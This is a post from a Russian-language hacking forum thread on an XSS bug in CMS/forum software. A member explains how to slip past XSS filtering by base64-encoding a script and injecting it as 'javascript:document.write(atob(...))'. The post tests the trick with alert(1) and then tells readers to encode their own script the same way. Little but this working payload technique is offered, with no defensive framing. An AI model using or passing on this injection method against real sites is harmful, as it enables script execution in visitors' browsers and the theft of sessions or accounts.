HOME FORUMS MEMBERS RECENT POSTS LOG IN  
× Авторизация
Имя пользователя:
Пароль:
Нет аккаунта? Регистрация
Баннер 1   Баннер 2
НОВЫЕ ТОРГОВАЯ НОВОСТИ ЧАТ
loading...
Скрыть
Вернуться   ANTICHAT > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости > Уязвимости CMS / форумов
Перезагрузить страницу XSS [Mega Big Bug]
   
 
 
Опции темы Поиск в этой теме Опции просмотра
Предыдущая Предыдущее сообщение   Следующее сообщение Следующая

  #24  
Старый 20.01.2015, 01:00
rox@hak
Постоянный
Регистрация: 04.07.2010
Сообщений: 592
С нами: 8345846

Репутация: 221


По умолчанию
для проверки кодируешь
source:

Код:
alert(1)

в бейс64
получится вот это -
source:

Код:
PHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0Pg
==

вставляешь вместо своего javascript:alert() вот это -
source:

Код:
javascript:document.
write
(
atob
(
'PHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0Pg=='
))

если алерт сработал , то уже кодируешь свой скрипт в бейс64 типа
source:

Код:




вставляешь между кавычками после atob!

а вообще это один из множества вариантов!


		
		
		
		
		
		
			





	
	







 
	
	
		

			
			
			
				Ответить с цитированием
			
			
		
      
			










	

	
		

	




















	
		 
		
	



















	«
			Предыдущая тема
		|
		Следующая тема
	»












	

	

		
			Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
		
	

	

		
			 
		
	

	





















































		

		
		

			
			

	

	
	
	Быстрый переход

	
	



					
		
		
		
























 




























ANTICHAT ™ © 2001- Antichat Kft.































×

Создать сделку



Продавец: ник или ID




Название сделки:




Сумма USDT:




Срок сделки, дней:




Кто платит комиссию:




Условия сделки:









После создания сделки средства будут зарезервированы в холде до завершения сделки.











×

Мои сделки


Загрузка...










×

Сделка






Загрузка чата...























×


ESCROW ADMIN PANEL






















Загрузка...





Загрузка...